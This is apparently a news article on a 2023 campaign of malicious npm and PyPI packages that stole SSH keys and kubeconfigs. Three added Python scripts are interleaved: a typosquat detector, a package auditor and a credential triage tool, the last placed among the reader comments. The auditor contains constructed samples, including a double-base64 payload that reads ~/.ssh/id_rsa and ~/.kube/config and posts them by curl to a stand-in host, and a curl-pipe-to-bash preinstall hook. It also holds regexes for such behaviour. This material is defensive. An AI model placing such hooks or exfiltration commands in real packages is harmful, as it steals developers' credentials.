https://www.bleepingcomputer.com/news/security/ssh-keys-stolen-by-stream-of-malicious-pypi-and-npm-packages/
SSH keys stolen by stream of malicious PyPI and npm packages
By Bill Toulas
September 27, 2023, 05:48 PM

A stream of malicious npm and PyPI packages has been found stealing a wide range of sensitive data from software developers on the platforms.

The campaign started on September 12, 2023, and was first discovered by Sonatype, whose analysts unearthed 14 malicious packages on npm. Phylum reports that after a brief operational hiatus on September 16 and 17, the attack resumed and expanded to the PyPI ecosystem.

Since the start of the campaign, the attackers have uploaded 45 packages to npm (40) and PyPI (5), with variants in the code indicating rapid evolution of the attack.

Malicious packages

The complete list of the malicious packages distributed in this campaign can be found at the bottom of Phylum's report. The following packages are worth singling out because they use typosquatting to resemble legitimate popular packages, which can trick developers into installing them:

* shineouts and @dynamic-form-components/shineout - mimicking the popular React library "Shineout"
* apm-web-vitals - could pass as an APM (application performance monitoring) add-on for Google's "web-vitals" library, which measures web performance
* eslint-plugin-shein-soc-raw and @spgy/eslint-plugin-spgy-fe - pretending to be ESLint plugins
* ssc-concurrent-log-handler and sc-concurrent-log-handler - pretending to be legitimate logging utilities

According to Phylum, there were at least seven distinct attack waves, with several phases featuring code modifications to enhance stealth and add more specific targeting.
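The four naming tricks in the list above (a trailing letter, the real name under an unrelated npm scope, and a prefix or suffix bolted onto the real name) can be caught mechanically before a package is allowed into a build. The script below is an added example written for this article, not tooling from Sonatype, Phylum or the registries; the POPULAR watchlist is a constructed stand-in for a real top-N download list, and the thresholds are assumptions chosen to fit the names reported in the campaign.

```python
"""Flag package names that look like typosquats of popular packages.
Added example for this article; it is not Sonatype's or Phylum's tooling."""
import re

# Constructed watchlist for the demo. In practice, load the registry's most
# downloaded names; the campaign squatted shineout, web-vitals and
# concurrent-log-handler, and used the eslint-plugin- naming convention.
POPULAR = ["shineout", "web-vitals", "concurrent-log-handler", "eslint-plugin-react"]


def normalize(name: str) -> str:
    """Lowercase, drop an npm scope (@org/) and treat '_' and '.' like '-'."""
    name = name.lower()
    if name.startswith("@") and "/" in name:
        name = name.split("/", 1)[1]
    return re.sub(r"[_.]", "-", name)


def edit_distance(a: str, b: str) -> int:
    """Optimal-string-alignment distance: insert, delete, substitute, transpose."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def typosquat_matches(candidate: str, popular=POPULAR) -> list[tuple[str, str]]:
    """Return (popular_name, reason) pairs for every way candidate resembles a
    popular package; an empty list means no similarity-based flag."""
    c = normalize(candidate)
    hits = []
    for p in popular:
        p_n = normalize(p)
        if c == p_n:
            # Same bare name, but published under a scope the real project does not use.
            if candidate.startswith("@") and not p.startswith("@"):
                hits.append((p, "real name republished under an unrelated scope"))
            continue
        # Assumed threshold: roughly one typo per eight characters of the real name.
        if edit_distance(c, p_n) <= 1 + len(p_n) // 8:
            hits.append((p, "near-identical name"))
            continue
        # The real name embedded whole, with extra hyphenated prefix/suffix segments.
        segs, p_segs = c.split("-"), p_n.split("-")
        n = len(p_segs)
        if n < len(segs) and any(segs[i:i + n] == p_segs for i in range(len(segs) - n + 1)):
            hits.append((p, "real name wrapped in extra prefix/suffix segments"))
    return hits


if __name__ == "__main__":
    for name in ["shineouts", "@dynamic-form-components/shineout", "apm-web-vitals",
                 "ssc-concurrent-log-handler", "eslint-plugin-shein-soc-raw", "web-vitals"]:
        print(f"{name:40} {typosquat_matches(name) or 'no match'}")
```

Note what this does not catch: eslint-plugin-shein-soc-raw is flagged by nothing here, because it only borrows the ESLint plugin naming convention rather than a specific package name. Similarity checks belong in front of an allowlist or a private registry proxy, not in place of one.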
The first attack waves occurred between September 12 and 15, with the threat actors uploading new package sets daily, reaching a total of 33 packages. Later waves followed on September 18 (three packages), September 20 (five packages), and September 24 (four packages).

In the initial waves, the packages had hardcoded data collection and exfiltration routines, with the collection code stored in plain text inside the package, which made them easy to detect.

The middle iterations introduced more complex mechanisms, such as retrieving the data-collecting bash script from an external domain and executing it.

Retrieving the bash script from an external source (Phylum)

The authors also added a "preinstall" hook so that the malicious JavaScript runs automatically during installation, before the developer has imported or executed anything from the package.

The most recent packages use base64 encoding to hinder analysis, later upgraded to double base64 encoding, where the decoded payload is itself base64 and has to be decoded a second time.

Overall, the attackers engaged in a continuous process of testing and refining their code, and even delivered packages that specialized in some aspects of data collection more than others.

Info-stealing threat

The data stolen by the packages includes sensitive machine and user information: hostname, username, current working directory, OS version, external and internal IP addresses and, for the PyPI packages, the Python version.

These details, together with the Kubernetes configuration stored in kubeconfig files and the SSH private key in ~/.ssh/id_rsa, are written to a text file (ConceptualTest.txt) and sent to the attackers' servers.

Content of the bash script (Phylum)

The stolen information can be used to expose the real identities of developers and give the attackers unauthorized access to any systems, servers or infrastructure reachable with the stolen SSH private keys.
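The three evolutions described above (a lifecycle hook that runs on install, a fetch-and-execute of a remote script, and single or double base64 wrapping) are exactly what a pre-install audit should look for in a package's package.json and the files its hooks launch. The script below is an added example for this article, not Phylum's or Sonatype's tooling; the two sample packages, the example.invalid host and the indicator regexes are constructed for the demo and are heuristics, not a complete signature set.

```python
"""Audit an npm package manifest for install-time hooks and the obfuscation
tricks described above. Added example for this article; it is not Phylum's
or Sonatype's tooling, and the sample packages below are constructed."""
import base64
import binascii
import re

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic indicators derived from the campaign description.
INDICATORS = {
    "remote_fetch": re.compile(r"\b(curl|wget)\b[^\n]*https?://"),
    "pipe_to_shell": re.compile(r"\|\s*(ba)?sh\b"),
    "base64_decode": re.compile(
        r"base64\s+(-d|--decode)\b|\batob\(|Buffer\.from\([^)]*['\"]base64['\"]"),
    "ssh_key_read": re.compile(r"\.ssh/id_(rsa|ed25519|ecdsa|dsa)\b"),
    "kubeconfig_read": re.compile(r"\.kube/config|\bKUBECONFIG\b"),
}
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/=]{24,})['\"]")
NODE_FILE = re.compile(r"\bnode\s+(\S+\.[cm]?js)\b")


def peel_base64(blob: str, max_depth: int = 4) -> list[str]:
    """Decode a base64 blob repeatedly until the result is no longer base64.
    Returns each decoded layer, so double encoding yields two layers."""
    layers, current = [], blob.strip()
    for _ in range(max_depth):
        if not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", current):
            break
        try:
            current = base64.b64decode(current, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            break
        layers.append(current)
    return layers


def scan_text(text: str) -> tuple[set[str], int]:
    """Match indicators against text and against every base64 layer hidden in it."""
    layers = [layer for lit in B64_LITERAL.findall(text) for layer in peel_base64(lit)]
    hits = set()
    for chunk in [text, *layers]:
        for name, rx in INDICATORS.items():
            if rx.search(chunk):
                hits.add(name)
    return hits, len(layers)


def audit_package(manifest: dict, files: dict[str, str]) -> dict:
    """Report lifecycle hooks, indicators found in hook commands and in any JS
    file they launch, and how many base64 layers had to be peeled to see them."""
    scripts = manifest.get("scripts", {})
    hooks = {h: scripts[h] for h in LIFECYCLE_HOOKS if h in scripts}
    indicators, layers = set(), 0
    for cmd in hooks.values():
        texts = [cmd] + [files.get(f, "") for f in NODE_FILE.findall(cmd)]
        for text in texts:
            hits, n = scan_text(text)
            indicators |= hits
            layers += n
    return {"name": manifest.get("name"), "hooks": hooks,
            "indicators": sorted(indicators), "decoded_layers": layers}


# Constructed samples mirroring the campaign's middle and late waves (not real package contents).
_PAYLOAD = (b"cat ~/.ssh/id_rsa ~/.kube/config > ConceptualTest.txt; "
            b"curl -s -X POST -d @ConceptualTest.txt http://example.invalid/upload")
_INNER = base64.b64encode(_PAYLOAD).decode()
_OUTER = base64.b64encode(_INNER.encode()).decode()  # double base64, as in the late waves
SAMPLE_LATE = (
    {"name": "shineouts", "version": "1.0.3", "scripts": {"preinstall": "node index.js"}},
    {"index.js": f'const p = "{_OUTER}";\n'
                 'require("child_process").exec(Buffer.from('
                 'Buffer.from(p, "base64").toString(), "base64").toString());\n'},
)
SAMPLE_MIDDLE = (
    {"name": "apm-web-vitals", "scripts": {"preinstall": "curl -s http://example.invalid/c.sh | bash"}},
    {},
)

if __name__ == "__main__":
    for manifest, files in (SAMPLE_MIDDLE, SAMPLE_LATE):
        print(audit_package(manifest, files))
```

Two caveats for anyone deploying something like this. First, the regexes are trivially evaded (hex encoding, string concatenation, a fetch from a non-http URL scheme), so treat a hit as a reason to refuse the package, not a miss as a reason to trust it. Second, the hook problem itself has a blunt fix that does not depend on detection: npm honours `npm install --ignore-scripts` (or `npm config set ignore-scripts true`), and pip avoids running setup.py when restricted to wheels with `pip install --only-binary=:all:`; both break packages that legitimately need install scripts, which is the trade-off to decide per build environment.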
If the stolen Kubernetes configurations contain credentials for accessing clusters, the attackers could modify deployments, add malicious containers, access sensitive data stored in the cluster, move laterally, or launch a ransomware attack.

Users of code distribution platforms such as PyPI and npm are advised to be cautious about which packages they download and run on their systems, as there is a constant influx of malware into those ecosystems.

Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks.

Comments

Thor-x86 - 2 months ago
TPM (trusted platform module) is the only way to store private keys securely, of course with passphrase. Most modern laptops have one.
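The first question for a developer who installed one of these packages is what the attacker actually got: a ~/.ssh/id_rsa that is usable as-is, or one that still needs a passphrase cracked; a kubeconfig with a static token or embedded client certificate, or one whose user entries rely on an exec plugin the attacker does not hold. The triage helper below is an added example for this article, not tooling from the article or any vendor. The OpenSSH key files and the kubeconfig dictionary are constructed fixtures (only the OpenSSH header fields, the cipher and KDF names, are parsed, so the fixtures contain no key material); a real kubeconfig would be loaded from YAML first.

```python
"""Triage what an attacker gains from a stolen ~/.ssh/id_rsa and kubeconfig.
Added example for this article, not tooling from the article or the vendors."""
import base64
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"

# kubeconfig user fields that work from any machine, with no local helper needed.
STATIC_FIELDS = {
    "token": "static bearer token",
    "client-certificate-data": "embedded client certificate",
    "client-key-data": "embedded client private key",
    "password": "basic-auth password",
}


def _read_string(buf: bytes, offset: int) -> tuple[bytes, int]:
    """Read one SSH wire-format string (uint32 big-endian length + bytes)."""
    (length,) = struct.unpack_from(">I", buf, offset)
    start = offset + 4
    return buf[start:start + length], start + length


def ssh_key_protection(pem: str) -> str:
    """Classify a private key file as 'unencrypted', 'passphrase' or 'unknown'.
    OpenSSH format: the header carries the cipher and KDF names ('none' when
    unprotected). Legacy PEM: encryption is signalled by Proc-Type: 4,ENCRYPTED
    or by the ENCRYPTED PRIVATE KEY (PKCS#8) banner."""
    lines = [ln.strip() for ln in pem.strip().splitlines()]
    if not lines or not lines[0].startswith("-----BEGIN"):
        return "unknown"
    if "OPENSSH PRIVATE KEY" in lines[0]:
        body = base64.b64decode("".join(lines[1:-1]))
        if not body.startswith(OPENSSH_MAGIC):
            return "unknown"
        cipher, off = _read_string(body, len(OPENSSH_MAGIC))
        kdf, _ = _read_string(body, off)
        return "unencrypted" if cipher == b"none" and kdf == b"none" else "passphrase"
    if "ENCRYPTED PRIVATE KEY" in lines[0]:
        return "passphrase"
    encrypted = any(ln.startswith("Proc-Type: 4,ENCRYPTED") for ln in lines)
    return "passphrase" if encrypted else "unencrypted"


def kubeconfig_exposure(cfg: dict) -> list[dict]:
    """For each context, say whether its user entry is reusable as-is by whoever
    holds the file (static credentials) or depends on an exec/auth-provider helper."""
    users = {u["name"]: u.get("user", {}) for u in cfg.get("users", [])}
    clusters = {c["name"]: c.get("cluster", {}) for c in cfg.get("clusters", [])}
    report = []
    for ctx in cfg.get("contexts", []):
        user = users.get(ctx["context"].get("user"), {})
        static = [desc for field, desc in STATIC_FIELDS.items() if field in user]
        if static:
            creds = static
        elif "exec" in user:
            creds = ["exec plugin"]
        elif "auth-provider" in user:
            creds = ["auth-provider"]
        else:
            creds = ["none"]
        report.append({
            "context": ctx["name"],
            "server": clusters.get(ctx["context"].get("cluster"), {}).get("server"),
            "reusable": bool(static),
            "credentials": creds,
        })
    return report


def _fake_openssh_key(cipher: bytes, kdf: bytes) -> str:
    """Constructed fixture: an OpenSSH key file with header fields only, no key material."""
    body = OPENSSH_MAGIC
    for s in (cipher, kdf, b""):            # ciphername, kdfname, kdfoptions
        body += struct.pack(">I", len(s)) + s
    body += struct.pack(">I", 1)            # number of keys
    b64 = base64.b64encode(body).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


SAMPLE_PLAIN_KEY = _fake_openssh_key(b"none", b"none")
SAMPLE_ENCRYPTED_KEY = _fake_openssh_key(b"aes256-ctr", b"bcrypt")
SAMPLE_KUBECONFIG = {  # constructed; in practice yaml.safe_load() of ~/.kube/config
    "clusters": [{"name": "prod", "cluster": {"server": "https://prod.example.invalid:6443"}}],
    "users": [
        {"name": "sa-deployer", "user": {"token": "REDACTED-STATIC-TOKEN"}},
        {"name": "sso-user", "user": {"exec": {"command": "kubelogin"}}},
    ],
    "contexts": [
        {"name": "deployer@prod", "context": {"cluster": "prod", "user": "sa-deployer"}},
        {"name": "me@prod", "context": {"cluster": "prod", "user": "sso-user"}},
    ],
}

if __name__ == "__main__":
    print("id_rsa (plain):", ssh_key_protection(SAMPLE_PLAIN_KEY))
    print("id_rsa (encrypted):", ssh_key_protection(SAMPLE_ENCRYPTED_KEY))
    for row in kubeconfig_exposure(SAMPLE_KUBECONFIG):
        print(row)
```

Either answer ends in rotation: an unencrypted key is already usable, and a passphrase only buys time against offline guessing. On the Kubernetes side, static tokens can be revoked, but Kubernetes has no client certificate revocation, so an embedded client certificate stays valid until it expires unless the cluster CA is rotated or the subject's RBAC bindings are removed; an exec-plugin user is only as safe as the cloud or SSO identity behind it.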
Copyright 2003 - 2023 Bleeping Computer LLC - All Rights Reserved